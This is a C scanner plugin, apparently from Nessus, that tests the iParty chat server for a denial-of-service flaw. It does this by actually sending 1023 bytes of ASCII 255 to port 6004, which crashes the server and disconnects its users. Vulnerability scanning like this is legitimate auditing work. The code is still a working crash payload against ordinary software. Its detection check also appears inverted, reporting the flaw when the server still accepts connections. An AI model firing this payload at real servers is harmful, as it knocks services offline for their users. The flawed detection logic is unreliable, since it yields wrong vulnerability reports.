/*
 * 
 * iParty
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h> 


#define NAME "iParty"
#define DESC "\
iParty is an audio/text chat program for Windows.  The iParty server\n\
listens on a specified port (6004 is default) for client requests.  If\n\
someone connects to the chat server and sends a large amount of ASCII 255\n\
chars, the server will simply close itself and disconnect all the current users.\n\
Risk factor : Low/Medium"

#define COPYRIGHT "found by HD Moore <hdmoore@USA.NET>"
#define SUMM "shuts down a remote iParty server"


PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_DENIAL);
	plug_set_family(desc, "Denial of Service");
	return(0);
}



PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	int soc;
	char * buf;
	if(host_get_port_state(args, 6004))
	{
	soc = open_sock_tcp(args, 6004);
	buf = emalloc(1024);
        memset(buf, 255, 1023);
	send(soc, buf, strlen(buf), 0);
        shutdown(soc, 2);
        close(soc);
        efree(&buf);
        
        if((soc = open_sock_tcp(args, 6004))>=0)
        {
	post_hole(args,6004,
	
"It was possible to shut down the remote iParty\n\
server by sending it a large amount of the ASCII char\n\
255.\n\
Solution : contact your vendor for a fix");
        }
        else 
        { 
        shutdown(soc, 2);
	close(soc);
        }
	}
	return(0);
}

